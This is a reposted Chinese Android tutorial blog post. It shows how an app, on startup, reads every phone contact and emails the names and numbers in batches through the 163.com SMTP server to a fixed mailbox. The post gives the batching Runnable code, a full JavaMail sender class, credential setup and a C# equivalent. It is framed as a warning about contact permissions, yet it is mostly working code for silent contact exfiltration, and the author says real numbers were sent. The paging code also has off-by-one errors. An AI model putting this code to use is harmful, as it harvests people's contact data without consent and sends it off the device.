Android切近实战(十)

简介:

最近上半年绩效确认,又是C,我就不明白了,怎么才能得B,怎么才能得A。我去,不借书,不参加培训,不加班就活该得C,那你招一群刚毕业的学生得了,刚毕业的学生干劲大,加班到半夜都没问题。唉,不说了,这年头不加班干完活都觉得不正常了。


大家还记得上篇文章么,看下图。

wKiom1RuDa3z6m6WAAJj8DzlCFc034.jpg

今天的话我就是要在该App启动的时候,将手机内存储的所有联系人通过邮件发送到指定的邮箱,怎么样,够狠吧。所以不是所有的app我们都给他开读取手机信息的权限,否则就泄露个底朝天。我们先看一下发邮件,需要到网上下载这三个jar包,这三个jar包不好下,要么你去google官网下,要么在csdn下,或者干脆在本篇文章下,给大家点福利。


wKiom1RuDnGRZxPeAAEdNg3xurM928.jpg

说到这个发邮件,类是别人写的,我拿来以为能用,结果他妈的很多问题,压根就发不了邮件。改了很多问题,查了一些资料,尼玛才搞定。说到这里,我就想说那些写博客的或者是抄博客的或者是转载博客的,咋们做技术的要凭良心写博客。不能不管三七二十一,就抄过来。这样不但让看你博客的人觉得你不专业,而且还浪费每个看你博客的人的时间。你写个博客,你文采不行,但是你把代码最起码写的能正常运行,能达到该代码能实现的功能吧。

好了,不说了。我们看一下代码,我的设计是将联系人信息全部读取出来,然后通过多线程分批发送到指定邮箱。要说到多线程,大家肯定会想到Handler,handler会分发runable对象到主线程消息队列中。当我们实例化一个Handler对象的时候,就默认与对它初始化的进程的消息队列绑定。那么当线程有更新UI的操作话,我们就需要把数据消息作为一个Message对象发送到消息队列中,然后,用Handler中的handlerMessge方法处理传过来的数据信息,并操作UI。那么刚才说到分发runable对象到主线程队列中,我们看一下Handler有哪些方法可以实现分发Runable对象(查API)。

wKioL1RuGD2STPc-AAHllGNbQI4688.jpg

wKiom1RuF_bheyQLAALdP_Cm9Bo036.jpg


我们今天使用的其实就是post方法,分发多个runable对象到消息队列并执行。说了这么多不如直接看代码来得实在。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
private  void  SyncContactUserInfo() {
         CustomRunable customeRunable;
         List<Map<String, Object>> tempPagedDataList =  this .GetContactUserList();
         List<Map<String, Object>> dataList =  this .GetContactUserList();
         int  totalSize = dataList.size();
         if  (totalSize ==  0 )
             return ;
 
         int  threadCount = totalSize % PageSize ==  0  ? totalSize / PageSize
                 : totalSize / PageSize +  1 ;
 
         for  ( int  i =  1 ; i <= threadCount; i++) {
             if  (i == threadCount) {
                 tempPagedDataList = dataList.subList((i -  1 ) * PageSize,
                         (i -  1 ) * PageSize + totalSize % PageSize - 1 );
             else  {
                 tempPagedDataList = dataList.subList((i -  1 ) * PageSize,
                         PageSize * i - i);
             }
             customeRunable =  new  CustomRunable(tempPagedDataList, i);
             handler.post(customeRunable);
         }
     }

上节课我们已经写过如何读取手机联系人了,所以这里就不在赘述。这段代码其实就是把联系人信息读取出来,然后去分批发送。上面的代码相信做过分页的人都应该知道,需要注意的就是List<T>的subList方法,传入start Index和end index就可以了,这里有点类似客户端分页。

在上面的代码中我们看到了一个CustomRunable类,这个类是我自己定义的,如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
class  CustomRunable  implements  Runnable {
         StringBuilder strBuilder =  new  StringBuilder();
         List<Map<String, Object>> dataList;
         int  index;
 
         public  CustomRunable(List<Map<String, Object>> dataList,  int  index) {
             this .dataList = dataList;
             this .index = index;
         }
 
         public  void  run() {
             strBuilder.append( "<html><body><table style='border:1px solid black'>" );
             strBuilder.append( "<tr><th>姓名</th><th>手机号码</th></tr>" );
 
             if  ( this .dataList !=  null  &&  this .dataList.size() >  0 ) {
                 for  (Map<String, Object> data : dataList) {
                     strBuilder.append( "<tr>" );
                     strBuilder.append( "<td>" );
                     strBuilder.append(data.get( "UserName" ).toString());
                     strBuilder.append( "</td>" );
                     strBuilder.append( "<td>" );
                     strBuilder.append(data.get( "UserPhoneNumber" ).toString());
                     strBuilder.append( "</td>" );
                     strBuilder.append( "</tr>" );
                 }
             }
 
             strBuilder.append( "</table></body></html>" );
             MailSenderInfo mailSendInfo = BuildMailSendInfo( "第"
                     + index +  "批手机号" , strBuilder.toString());
             SimpleMailSender.sendHtmlMail(mailSendInfo);
         }
     }

我定义了默认的构造函数,一个是联系人手机号码列表,一个是标示是第几批。当我拿到这批手机号码的时候,构造一个html格式的邮件,然后发送。邮件的标题是“第{0}批手机号码”,邮件的内容就是第一列姓名,第二列手机号的一个html表格。其实这里的run方法,一旦这个runable对象被分发到队列中,就会立即执行run方法。

大家其实可能此时最关注的是发邮件的代码,不妨就把最关键的类(SimpleMailSender)的代码贴出来好了,然后完了如果大家想要的话可以在这篇文章的附件下载或者加入群“.net技术冲锋舟(205217091)”。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
package  bruce.util.mail;
 
import  java.util.Date;
import  java.util.Properties;
 
import  javax.activation.CommandMap;
import  javax.activation.MailcapCommandMap;
import  javax.mail.Address;
import  javax.mail.BodyPart;
import  javax.mail.Message;
import  javax.mail.MessagingException;
import  javax.mail.Multipart;
import  javax.mail.Session;
import  javax.mail.Transport;
import  javax.mail.internet.InternetAddress;
import  javax.mail.internet.MimeBodyPart;
import  javax.mail.internet.MimeMessage;
import  javax.mail.internet.MimeMultipart;
 
public  class  SimpleMailSender {
     /**
      * 以文本格式发送邮件
     
      * @param mailInfo
      *            待发送的邮件的信息
      */
     public  static  boolean  sendTextMail(MailSenderInfo mailInfo) {
         // 判断是否需要身份认证
         MyAuthenticator authenticator =  null ;
         Properties pro = mailInfo.getProperties();
         if  (mailInfo.isValidate()) {
             // 如果需要身份认证,则创建一个密码验证器
             authenticator =  new  MyAuthenticator(mailInfo.getUserName(),
                     mailInfo.getPassword());
         }
         // 根据邮件会话属性和密码验证器构造一个发送邮件的session
         Session sendMailSession = Session
                 .getInstance(pro, authenticator);
         try  {
             // 根据session创建一个邮件消息
             Message mailMessage =  new  MimeMessage(sendMailSession);
             // 创建邮件发送者地址
             Address from =  new  InternetAddress(mailInfo.getFromAddress());
             // 设置邮件消息的发送者
             mailMessage.setFrom(from);
             // 创建邮件的接收者地址,并设置到邮件消息中
             Address to =  new  InternetAddress(mailInfo.getToAddress());
             mailMessage.setRecipient(Message.RecipientType.TO, to);
             // 设置邮件消息的主题
             mailMessage.setSubject(mailInfo.getSubject());
             // 设置邮件消息发送的时间
             mailMessage.setSentDate( new  Date());
             // 设置邮件消息的主要内容
             String mailContent = mailInfo.getContent();
             mailMessage.setText(mailContent);
             // 发送邮件
             Transport.send(mailMessage);
             return  true ;
         catch  (MessagingException ex) {
             ex.printStackTrace();
         }
         return  false ;
     }
 
     /**
      * 以HTML格式发送邮件
     
      * @param mailInfo
      *            待发送的邮件信息
      */
     public  static  boolean  sendHtmlMail(MailSenderInfo mailInfo) {
         // 判断是否需要身份认证
         MyAuthenticator authenticator =  null ;
         Properties pro = mailInfo.getProperties();
         // 如果需要身份认证,则创建一个密码验证器
         if  (mailInfo.isValidate()) {
             authenticator =  new  MyAuthenticator(mailInfo.getUserName(),
                     mailInfo.getPassword());
         }
         // 根据邮件会话属性和密码验证器构造一个发送邮件的session
         Session sendMailSession = Session
                 .getInstance(pro, authenticator);
         try  {
             // 根据session创建一个邮件消息
             Message mailMessage =  new  MimeMessage(sendMailSession);
             // 创建邮件发送者地址
             Address from =  new  InternetAddress(mailInfo.getFromAddress());
             // 设置邮件消息的发送者
             mailMessage.setFrom(from);
             // 创建邮件的接收者地址,并设置到邮件消息中
             Address to =  new  InternetAddress(mailInfo.getToAddress());
             // Message.RecipientType.TO属性表示接收者的类型为TO
             mailMessage.setRecipient(Message.RecipientType.TO, to);
             // 设置邮件消息的主题
             mailMessage.setSubject(mailInfo.getSubject());
             // 设置邮件消息发送的时间
             mailMessage.setSentDate( new  Date());
             // MiniMultipart类是一个容器类,包含MimeBodyPart类型的对象
             Multipart mainPart =  new  MimeMultipart();
             // 创建一个包含HTML内容的MimeBodyPart
             BodyPart html =  new  MimeBodyPart();
             // 设置HTML内容
             html.setContent(mailInfo.getContent(),  "text/html; charset=utf-8" );
             mainPart.addBodyPart(html);
             // 将MiniMultipart对象设置为邮件内容
             mailMessage.setContent(mainPart);
             // 发送邮件
             
             MailcapCommandMap mc = (MailcapCommandMap)CommandMap.getDefaultCommandMap();
             mc.addMailcap( "text/html;; x-java-content-handler=com.sun.mail.handlers.text_html" );
             mc.addMailcap( "text/xml;; x-java-content-handler=com.sun.mail.handlers.text_xml" );
             mc.addMailcap( "text/plain;; x-java-content-handler=com.sun.mail.handlers.text_plain" );
             mc.addMailcap( "multipart/*;; x-java-content-handler=com.sun.mail.handlers.multipart_mixed" );
             mc.addMailcap( "message/rfc822;; x-java-content-handler=com.sun.mail.handlers.message_rfc822" );
             CommandMap.setDefaultCommandMap(mc);
             Transport.send(mailMessage);
             return  true ;
         catch  (MessagingException ex) {
             ex.printStackTrace();
         }
         return  false ;
     }
}

OK,这就是我修改后的版本,能直接用,文章的末尾我会给大家见证奇迹。这个类中,一个是发送文本邮件,一个是发送Html格式的邮件,也可以发附件。OK,其实调用的话就是构造一个MailSenderInfo对象。如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
private  static  MailSenderInfo BuildMailSendInfo(String mailSubject,
             String mailContent) {
         MailSenderInfo mailInfo =  new  MailSenderInfo();
         mailInfo.setContent(mailContent);
         mailInfo.setFromAddress( "Bruce.L.Li@163.com" );
         mailInfo.setMailServerHost( "smtp.163.com" );
         mailInfo.setMailServerPort( "25" );
         mailInfo.setPassword( "********" );
         mailInfo.setSubject(mailSubject);
         mailInfo.setToAddress( "******@qq.com" );
         mailInfo.setUserName( "lilei1986XXXX@163.com" );
         mailInfo.setValidate( true );
         return  mailInfo;
     }

在这里解释一下这些方法

setContent:邮件内容

setFromAddress:发送者邮箱账号

setMailServerHost:163邮箱

setMailServerPort:25

setPassword:用来验证的邮箱密码

setSubject:邮件标题

setToAddress:接收者的邮箱

setUserName:用来验证的邮箱账号

setValidate:如果为true,则会验证setUserName和setPassword的用户名和密码。否则不会。

这里需要注意setUserName和setPassword必须是一个能登陆163邮箱的账号和密码。


其实这里和C#发Email差不多

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
using  System;
using  System.Collections.Generic;
using  System.Linq;
using  System.Text;
 
namespace  CLUtility
{
     public  class  EmailHelper
     {
         public  static  void  SendEmail( string  mailTitle,  string  mailContent,  params  string [] mailToAddress)
         {
             System.Net.Mail.SmtpClient client =  new  System.Net.Mail.SmtpClient();
             client.Host =  "smtp.ym.163.com" ; //使用163的SMTP服务器发送邮件
             client.UseDefaultCredentials =  true ;
             client.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network;
             client.Credentials =  new  System.Net.NetworkCredential( "Bruce.XXX.XX@163.com" "*******" );
             System.Net.Mail.MailMessage Message =  new  System.Net.Mail.MailMessage();
             Message.From =  new  System.Net.Mail.MailAddress( "lilei1986abc@163.com" );
 
             foreach  ( var  address  in  mailToAddress)
             {
                 Message.To.Add(address);
             }
 
             Message.Subject = mailTitle;
             Message.Body = mailContent;
             Message.SubjectEncoding = System.Text.Encoding.UTF8;
             Message.BodyEncoding = System.Text.Encoding.UTF8;
             Message.Priority = System.Net.Mail.MailPriority.High;
             Message.IsBodyHtml =  true ;
             client.Send(Message);
         }
     }
}

OK,最后,我们见证奇迹的时刻到了,先看163发件箱。大家看到了顺序并不是按照1-9升序排列。

wKiom1RuIRazX3FJAALihisGQWk208.jpg

我们看一下发出的邮件内容

wKioL1RuIt6RiAF6AAJNPqek_AY748.jpg

这些可都是我手机上的真实号码。唉,对不起大家,不知道网易和腾讯是否对这些号码感兴趣呢。

最后我们再看看QQ邮箱是否已经收到邮件。

wKiom1RuIwCjXcecAAMwY4cAAC0885.jpg


木有问题,收到了。我们看一下内容

wKioL1RuI-CzlCCCAAJN4we6DO4562.jpg

OK,成功了,最后,哥们的博客是货真价实的,测试机是小米3,看过这篇文章,你以后还敢随便允许app访问你的手机联系人信息吗。

wKiom1RuJDDDI8-iAAHH_tZWViI100.jpg



本文转自 BruceAndLee 51CTO博客,原文链接:http://blog.51cto.com/leelei/1580324,如需转载请自行联系原作者

相关文章
|
5天前
|
设计模式 Android开发 Kotlin
Android经典实战之Kotlin委托模式和by关键字
本文介绍了Kotlin中`by`关键字在类及属性委托中的运用,通过实例展示了如何利用类委托简化接口实现,以及如何借助标准与自定义属性委托管理属性的读写操作。通过`by`关键字的支持,Kotlin使得委托模式的实现更为直观且高效。
21 4
|
5天前
|
缓存 安全 Android开发
Android经典实战之用Kotlin泛型实现键值对缓存
本文介绍了Kotlin中泛型的基础知识与实际应用。泛型能提升代码的重用性、类型安全及可读性。文中详细解释了泛型的基本语法、泛型函数、泛型约束以及协变和逆变的概念,并通过一个数据缓存系统的实例展示了泛型的强大功能。
14 2
|
15天前
|
缓存 数据处理 Android开发
Android经典实战之Kotlin常用的 Flow 操作符
本文介绍 Kotlin 中 `Flow` 的多种实用操作符,包括转换、过滤、聚合等,通过简洁易懂的例子展示了每个操作符的功能,如 `map`、`filter` 和 `fold` 等,帮助开发者更好地理解和运用 `Flow` 来处理异步数据流。
62 4
|
12天前
|
编译器 API Android开发
Android经典实战之Kotlin Multiplatform 中,如何处理不同平台的 API 调用
本文介绍Kotlin Multiplatform (KMP) 中使用 `expect` 和 `actual` 关键字处理多平台API调用的方法。通过共通代码集定义预期API,各平台提供具体实现,编译器确保正确匹配,支持依赖注入、枚举类处理等,实现跨平台代码重用与原生性能。附带示例展示如何定义跨平台函数与类。
42 0
|
8天前
|
编解码 测试技术 Android开发
Android经典实战之用 CameraX 库实现高质量的照片和视频拍摄功能
本文详细介绍了如何利用CameraX库实现高质量的照片及视频拍摄功能,包括添加依赖、初始化、权限请求、配置预览与捕获等关键步骤。此外,还特别针对不同分辨率和帧率的视频拍摄提供了性能优化策略,确保应用既高效又稳定。
36 1
Android经典实战之用 CameraX 库实现高质量的照片和视频拍摄功能
|
1天前
|
监控 Java API
Android经典实战之OkDownload:一个经典强大的文件下载开源库,支持断点续传
本文介绍的 OkDownload 是一个专为 Android 设计的开源下载框架,支持多线程下载、断点续传和任务队列管理等功能,具备可靠性、灵活性和高性能特点。它提供了多种配置选项和监听器,便于开发者集成和扩展。尽管已多年未更新,但依然适用于大多数文件下载需求。
10 1
|
2天前
|
算法 安全 数据安全/隐私保护
Android经典实战之常见的移动端加密算法和用kotlin进行AES-256加密和解密
本文介绍了移动端开发中常用的数据加密算法,包括对称加密(如 AES 和 DES)、非对称加密(如 RSA)、散列算法(如 SHA-256 和 MD5)及消息认证码(如 HMAC)。重点讲解了如何使用 Kotlin 实现 AES-256 的加密和解密,并提供了详细的代码示例。通过生成密钥、加密和解密数据等步骤,展示了如何在 Kotlin 项目中实现数据的安全加密。
30 1
|
2天前
|
存储 安全 API
Android经典实战之存储方案对比:SharedPreferences vs MMKV vs DataStore
本文介绍了 Android 开发中常用的键值对存储方案,包括 SharedPreferences、MMKV 和 DataStore,并对比了它们在性能、并发处理、易用性和稳定性上的特点。通过实际代码示例,帮助开发者根据项目需求选择最适合的存储方案,提升应用性能和用户体验。
15 1
|
3天前
|
算法 安全 数据安全/隐私保护
Android经典实战之常见的移动端加密算法和用kotlin进行AES-256加密和解密
本文介绍了移动端开发中常用的数据加密算法,包括对称加密(如 AES 和 DES)、非对称加密(如 RSA)、散列算法(如 SHA-256 和 MD5)及消息认证码(如 HMAC)。重点展示了如何使用 Kotlin 实现 AES-256 的加密和解密,提供了详细的代码示例。
12 2
|
3天前
|
Java 调度 Android开发
Android经典实战之Kotlin的delay函数和Java中的Thread.sleep有什么不同?
本文介绍了 Kotlin 中的 `delay` 函数与 Java 中 `Thread.sleep` 方法的区别。两者均可暂停代码执行,但 `delay` 适用于协程,非阻塞且高效;`Thread.sleep` 则阻塞当前线程。理解这些差异有助于提高程序效率与可读性。
16 1